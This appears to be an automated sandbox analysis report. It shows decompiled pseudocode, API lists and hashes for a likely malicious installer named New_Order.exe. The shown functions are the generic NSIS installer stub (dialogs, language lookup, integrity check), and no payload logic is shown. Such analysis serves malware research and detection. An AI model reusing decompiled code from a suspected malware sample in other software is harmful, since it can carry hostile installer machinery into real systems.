									_t74 = CreateDialogParamA( *0x42f420,  *_t131 +  *0x42ec00 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x42ebf8 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E0040417B(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ebf8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ebec - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ebf8, 8);
									E004041C7(0x405);
									goto L58;
								}
								__eflags =  *0x42f4cc - _t134;
								if( *0x42f4cc != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4c0 - _t134;
								if( *0x42f4c0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ebf8);
						 *0x42f428 = _t134;
						EndDialog(_t126,  *0x429c60);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
						__eflags =  *0x42ebec - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a870, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a870,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E004041E2(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ebf8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4cc - _t134;
										if( *0x42f4cc == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c60 = 1;
											L21:
											_push(0x78);
											L22:
											E00404154();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c60 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1dc - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ebf8);
						 *0x42ebf8 = _a12;
						L58:
						if( *0x42b890 == _t134) {
							_t143 =  *0x42ebf8 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x42b890 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                                                                        0x00403cb0
                                                                        0x00403cb9
                                                                        0x00403dfa
                                                                        0x00403dfe
                                                                        0x00403e02
                                                                        0x00403e04
                                                                        0x00403e09
                                                                        0x00403e14
                                                                        0x00403e1f
                                                                        0x00403e24
                                                                        0x00403e26
                                                                        0x00403e28
                                                                        0x00403e2b
                                                                        0x00403e30
                                                                        0x00403e3e
                                                                        0x00403e4b
                                                                        0x00403e52
                                                                        0x00403e52
                                                                        0x00403e53
                                                                        0x00403e53
                                                                        0x00403e58
                                                                        0x00403e5e
                                                                        0x00403e65
                                                                        0x00403e6b
                                                                        0x00403e6d
                                                                        0x00403ead
                                                                        0x00403eb2
                                                                        0x00403eb7
                                                                        0x00403eb7
                                                                        0x00403ebc
                                                                        0x00403ec5
                                                                        0x00403ec7
                                                                        0x00403ecc
                                                                        0x00403ed2
                                                                        0x00403ed6
                                                                        0x00403ed6
                                                                        0x00403edb
                                                                        0x00403ee1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403eec
                                                                        0x00403ef2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403efb
                                                                        0x00403f03
                                                                        0x00403f08
                                                                        0x00403f0b
                                                                        0x00403f11
                                                                        0x00403f16
                                                                        0x00403f19
                                                                        0x00403f1f
                                                                        0x00403f24
                                                                        0x00403f27
                                                                        0x00403f2d
                                                                        0x00403f35
                                                                        0x00403f3b
                                                                        0x00403f41
                                                                        0x00403f45
                                                                        0x00403f4c
                                                                        0x00403f4c
                                                                        0x00403f4c
                                                                        0x00403f56
                                                                        0x00403f68
                                                                        0x00403f74
                                                                        0x00403f79
                                                                        0x00403f83
                                                                        0x00403f89
                                                                        0x00403f8b
                                                                        0x00403f90
                                                                        0x00403f8d
                                                                        0x00403f8d
                                                                        0x00403f8d
                                                                        0x00403fa0
                                                                        0x00403fb8
                                                                        0x00403fba
                                                                        0x00403fc0
                                                                        0x00403fd5
                                                                        0x00403fc2
                                                                        0x00403fcb
                                                                        0x00403fcd
                                                                        0x00403fcd
                                                                        0x00403fdb
                                                                        0x00403fec
                                                                        0x00403ffd
                                                                        0x00404004
                                                                        0x0040400a
                                                                        0x0040400e
                                                                        0x00404013
                                                                        0x00404015
                                                                        0x00000000
                                                                        0x0040401b
                                                                        0x0040401b
                                                                        0x0040401d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404023
                                                                        0x00404027
                                                                        0x0040404c
                                                                        0x00404052
                                                                        0x00404058
                                                                        0x0040405a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404080
                                                                        0x00404086
                                                                        0x00404088
                                                                        0x0040408d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404093
                                                                        0x00404096
                                                                        0x00404099
                                                                        0x004040b0
                                                                        0x004040bc
                                                                        0x004040d5
                                                                        0x004040db
                                                                        0x004040df
                                                                        0x004040e4
                                                                        0x004040ea
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004040f4
                                                                        0x004040ff
                                                                        0x00000000
                                                                        0x004040ff
                                                                        0x00404029
                                                                        0x0040402f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404035
                                                                        0x0040403b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404041
                                                                        0x00404015
                                                                        0x0040410c
                                                                        0x00404118
                                                                        0x0040411f
                                                                        0x00000000
                                                                        0x00403e6f
                                                                        0x00403e6f
                                                                        0x00403e72
                                                                        0x00403ea5
                                                                        0x00403ea5
                                                                        0x00403ea7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403ea7
                                                                        0x00403e74
                                                                        0x00403e78
                                                                        0x00403e7d
                                                                        0x00403e7f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403e8f
                                                                        0x00403e97
                                                                        0x00000000
                                                                        0x00403e9d
                                                                        0x00403ccb
                                                                        0x00403ccb
                                                                        0x00403ccf
                                                                        0x00403cd4
                                                                        0x00403ce3
                                                                        0x00403ce3
                                                                        0x00403cec
                                                                        0x00403cf5
                                                                        0x00403d00
                                                                        0x00403d00
                                                                        0x00403d0c
                                                                        0x00403d28
                                                                        0x00403d2b
                                                                        0x00403d3e
                                                                        0x00403d44
                                                                        0x00403de7
                                                                        0x00000000
                                                                        0x00403df0
                                                                        0x00403d4a
                                                                        0x00403d57
                                                                        0x00403d59
                                                                        0x00403d5b
                                                                        0x00403d7a
                                                                        0x00403d7a
                                                                        0x00403d7d
                                                                        0x00403d82
                                                                        0x00403d85
                                                                        0x00403d95
                                                                        0x00403d96
                                                                        0x00403d98
                                                                        0x00403dce
                                                                        0x00403de1
                                                                        0x00000000
                                                                        0x00403de1
                                                                        0x00403d9a
                                                                        0x00403da0
                                                                        0x00403db9
                                                                        0x00403dbe
                                                                        0x00403dc0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403dc2
                                                                        0x00403dae
                                                                        0x00403dae
                                                                        0x00403db0
                                                                        0x00403db0
                                                                        0x00000000
                                                                        0x00403db0
                                                                        0x00403da3
                                                                        0x00403da8
                                                                        0x00000000
                                                                        0x00403da8
                                                                        0x00403d87
                                                                        0x00403d8d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403d8f
                                                                        0x00000000
                                                                        0x00403d8f
                                                                        0x00403d7f
                                                                        0x00000000
                                                                        0x00403d7f
                                                                        0x00403d65
                                                                        0x00403d6c
                                                                        0x00403d72
                                                                        0x00403d74
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403d74
                                                                        0x00403d30
                                                                        0x00000000
                                                                        0x00403d0e
                                                                        0x00403d14
                                                                        0x00403d1e
                                                                        0x00404125
                                                                        0x0040412b
                                                                        0x0040412d
                                                                        0x00404133
                                                                        0x00404138
                                                                        0x0040413e
                                                                        0x0040413e
                                                                        0x00404133
                                                                        0x00404148
                                                                        0x00000000
                                                                        0x00404148
                                                                        0x00403d0c

                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                                        • ShowWindow.USER32(?), ref: 00403D00
                                                                        • DestroyWindow.USER32 ref: 00403D14
                                                                        • SetWindowLongA.USER32 ref: 00403D30
                                                                        • GetDlgItem.USER32 ref: 00403D51
                                                                        • SendMessageA.USER32 ref: 00403D65
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                                        • GetDlgItem.USER32 ref: 00403E1A
                                                                        • GetDlgItem.USER32 ref: 00403E24
                                                                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403E3E
                                                                        • SendMessageA.USER32 ref: 00403E8F
                                                                        • GetDlgItem.USER32 ref: 00403F35
                                                                        • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                                        • EnableWindow.USER32(?,?), ref: 00403F68
                                                                        • EnableWindow.USER32(?,?), ref: 00403F83
                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                                        • EnableMenuItem.USER32 ref: 00403FA0
                                                                        • SendMessageA.USER32 ref: 00403FB8
                                                                        • SendMessageA.USER32 ref: 00403FCB
                                                                        • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                                        • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                                        • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                                        • String ID:
                                                                        • API String ID: 4050669955-0
                                                                        • Opcode ID: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
                                                                        • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                                        • Opcode Fuzzy Hash: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
                                                                        • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040390A, Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E0040390A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f434;
				_t17 = E00406500(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a890;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00405FDE(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a890, 0);
					__eflags =  *0x42a890;
					if(__eflags == 0) {
						E00405FDE(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a890, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00406055("1033", _t67 & 0x0000ffff);
				}
				E00403BCF(_t71, _t84);
				_t80 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x42f4c0 =  *0x42f43c & 0x00000020;
				 *0x42f4dc = 0x10000;
				if(E00405B7D(_t84, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405B7D(_t92, _t80) == 0) {
						E0040618A(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42ec08 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403BCF(_t71, __eflags);
							__eflags =  *0x42f4e0;
							if( *0x42f4e0 != 0) {
								_t28 = E004052F0(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ebec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a870, 5); // executed
							_t34 = E00406492("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E00406492("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42ebc0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42ebc0);
								 *0x42ebe4 = _t81;
								RegisterClassA(0x42ebc0);
							}
							_t36 =  *0x42ec00; // 0x0
							_t39 = DialogBoxParamA( *0x42f420, _t36 + 0x00000069 & 0x0000ffff, 0, E00403CA7, 0); // executed
							E0040385A(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f420;
						 *0x42ebc4 = E00401000;
						 *0x42ebd0 =  *0x42f420;
						 *0x42ebd4 = _t25;
						 *0x42ebe4 = 0x40a1f4;
						if(RegisterClassA(0x42ebc0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a870 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3c0;
					E00405FDE(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f478, 0x42e3c0, 0);
					_t57 =  *0x42e3c0; // 0x47
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3c1;
						 *((char*)(E00405ABA(0x42e3c1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E004060F7(_t80, E00405A8F(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405AD6(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}


























                                                                        0x00403910
                                                                        0x00403919
                                                                        0x00403920
                                                                        0x00403922
                                                                        0x00403936
                                                                        0x00403948
                                                                        0x0040394f
                                                                        0x00403956
                                                                        0x0040395c
                                                                        0x00403961
                                                                        0x00403967
                                                                        0x0040397a
                                                                        0x0040397a
                                                                        0x00403985
                                                                        0x00403924
                                                                        0x00403924
                                                                        0x0040392f
                                                                        0x0040392f
                                                                        0x0040398a
                                                                        0x00403994
                                                                        0x0040399d
                                                                        0x004039a2
                                                                        0x004039b3
                                                                        0x00403a3a
                                                                        0x00403a42
                                                                        0x00403a4b
                                                                        0x00403a4b
                                                                        0x00403a61
                                                                        0x00403a67
                                                                        0x00403a75
                                                                        0x00403af6
                                                                        0x00403afe
                                                                        0x00403b08
                                                                        0x00403b0d
                                                                        0x00403b13
                                                                        0x00403b9d
                                                                        0x00403ba2
                                                                        0x00403ba4
                                                                        0x00403bc0
                                                                        0x00000000
                                                                        0x00403bc0
                                                                        0x00403ba6
                                                                        0x00403bac
                                                                        0x00403bb4
                                                                        0x00403bb4
                                                                        0x00000000
                                                                        0x00403bac
                                                                        0x00403b21
                                                                        0x00403b2c
                                                                        0x00403b31
                                                                        0x00403b33
                                                                        0x00403b3a
                                                                        0x00403b3a
                                                                        0x00403b45
                                                                        0x00403b4d
                                                                        0x00403b4f
                                                                        0x00403b51
                                                                        0x00403b5a
                                                                        0x00403b5d
                                                                        0x00403b63
                                                                        0x00403b63
                                                                        0x00403b69
                                                                        0x00403b82
                                                                        0x00403b93
                                                                        0x00000000
                                                                        0x00403b98
                                                                        0x00403b00
                                                                        0x00403b02
                                                                        0x00000000
                                                                        0x00403a77
                                                                        0x00403a77
                                                                        0x00403a83
                                                                        0x00403a8d
                                                                        0x00403a93
                                                                        0x00403a98
                                                                        0x00403aa7
                                                                        0x00403bc5
                                                                        0x00403bc5
                                                                        0x00000000
                                                                        0x00403bc5
                                                                        0x00403ab6
                                                                        0x00403af1
                                                                        0x00000000
                                                                        0x00403af1
                                                                        0x004039b9
                                                                        0x004039b9
                                                                        0x004039bc
                                                                        0x004039be
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004039c8
                                                                        0x004039d8
                                                                        0x004039dd
                                                                        0x004039e4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004039e8
                                                                        0x004039ea
                                                                        0x004039f7
                                                                        0x004039f7
                                                                        0x004039ff
                                                                        0x00403a05
                                                                        0x00403a2d
                                                                        0x00403a35
                                                                        0x00000000
                                                                        0x00403a17
                                                                        0x00403a18
                                                                        0x00403a21
                                                                        0x00403a27
                                                                        0x00403a28
                                                                        0x00000000
                                                                        0x00403a28
                                                                        0x00403a23
                                                                        0x00403a25
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403a25
                                                                        0x00403a05

                                                                        APIs
                                                                          • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                          • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                        • GetUserDefaultUILanguage.KERNELBASE(00000002,7519FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\New_Order.exe" ,00000000), ref: 00403924
                                                                          • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                        • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,7519FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\New_Order.exe" ,00000000), ref: 00403985
                                                                        • lstrlenA.KERNEL32(GHFGHFGHFDGDFGDFg,?,?,?,GHFGHFGHFDGDFGDFg,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,7519FA90), ref: 004039FA
                                                                        • lstrcmpiA.KERNEL32(?,.exe,GHFGHFGHFDGDFGDFg,?,?,?,GHFGHFGHFDGDFGDFg,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                                                                        • GetFileAttributesA.KERNEL32(GHFGHFGHFDGDFGDFg), ref: 00403A18
                                                                        • LoadImageA.USER32 ref: 00403A61
                                                                        • RegisterClassA.USER32 ref: 00403A9E
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                                        • CreateWindowExA.USER32 ref: 00403AEB
                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                                        • GetClassInfoA.USER32 ref: 00403B4D
                                                                        • GetClassInfoA.USER32 ref: 00403B5A
                                                                        • RegisterClassA.USER32 ref: 00403B63
                                                                        • DialogBoxParamA.USER32 ref: 00403B82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: "C:\Users\user\Desktop\New_Order.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GHFGHFGHFDGDFGDFg$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                        • API String ID: 606308-1706872007
                                                                        • Opcode ID: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
                                                                        • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                                        • Opcode Fuzzy Hash: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
                                                                        • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402EA1, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E00402EA1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				intOrPtr* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\alfons\\Desktop\\New_Order.exe";
				 *0x42f430 = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\New_Order.exe", 0x400);
				_t89 = E00405C90(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\alfons\\Desktop";
				E004060F7("C:\\Users\\alfons\\Desktop", _t91);
				E004060F7(0x437000, E00405AD6(_t92));
				_t50 = GetFileSize(_t89, 0);
				 *0x42944c = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E3D(1);
					if( *0x42f438 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t94 = GlobalAlloc(0x40, _v24);
						E00403300( *0x42f438 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030D8(); // executed
						if(_t57 == _v24) {
							 *0x42f434 = _t94;
							 *0x42f43c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42f440 =  *0x42f440 + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405C4B(0x42f460, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E00403300( *0x41d440);
					if(E004032EA( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42f438) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E004032EA(0x415440, _t90) == 0) {
							E00402E3D(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42f438 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402E3D(0);
							}
							goto L20;
						}
						E00405C4B( &_v44, 0x415440, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x41d440; // 0x53fbf
							 *0x42f4e0 =  *0x42f4e0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x42f438 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t24 = _t80 - 4; // 0x40a194
								_t93 = _t24;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x42944c) {
							_v12 = E004065B7(_v12, 0x415440, _t90);
						}
						 *0x41d440 =  *0x41d440 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}




























                                                                        0x00402ea9
                                                                        0x00402eac
                                                                        0x00402eaf
                                                                        0x00402eb2
                                                                        0x00402eb8
                                                                        0x00402ec9
                                                                        0x00402ece
                                                                        0x00402ee1
                                                                        0x00402ee6
                                                                        0x00402ee9
                                                                        0x00402eef
                                                                        0x00000000
                                                                        0x00402ef1
                                                                        0x00402efc
                                                                        0x00402f02
                                                                        0x00402f13
                                                                        0x00402f1a
                                                                        0x00402f22
                                                                        0x00402f27
                                                                        0x00402f29
                                                                        0x00403014
                                                                        0x00403016
                                                                        0x00403022
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403027
                                                                        0x0040304b
                                                                        0x00403056
                                                                        0x00403061
                                                                        0x00403066
                                                                        0x00403069
                                                                        0x0040306a
                                                                        0x0040306b
                                                                        0x0040306d
                                                                        0x00403075
                                                                        0x0040308c
                                                                        0x00403094
                                                                        0x00403099
                                                                        0x0040309b
                                                                        0x0040309b
                                                                        0x004030a3
                                                                        0x004030a3
                                                                        0x004030a6
                                                                        0x004030a7
                                                                        0x004030a7
                                                                        0x004030aa
                                                                        0x004030ac
                                                                        0x004030ac
                                                                        0x004030b6
                                                                        0x004030bc
                                                                        0x004030ca
                                                                        0x00000000
                                                                        0x004030cf
                                                                        0x00000000
                                                                        0x00403075
                                                                        0x0040302f
                                                                        0x00403041
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402f2f
                                                                        0x00402f34
                                                                        0x00402f39
                                                                        0x00402f3d
                                                                        0x00402f44
                                                                        0x00402f4b
                                                                        0x00402f4d
                                                                        0x00402f4d
                                                                        0x00402f58
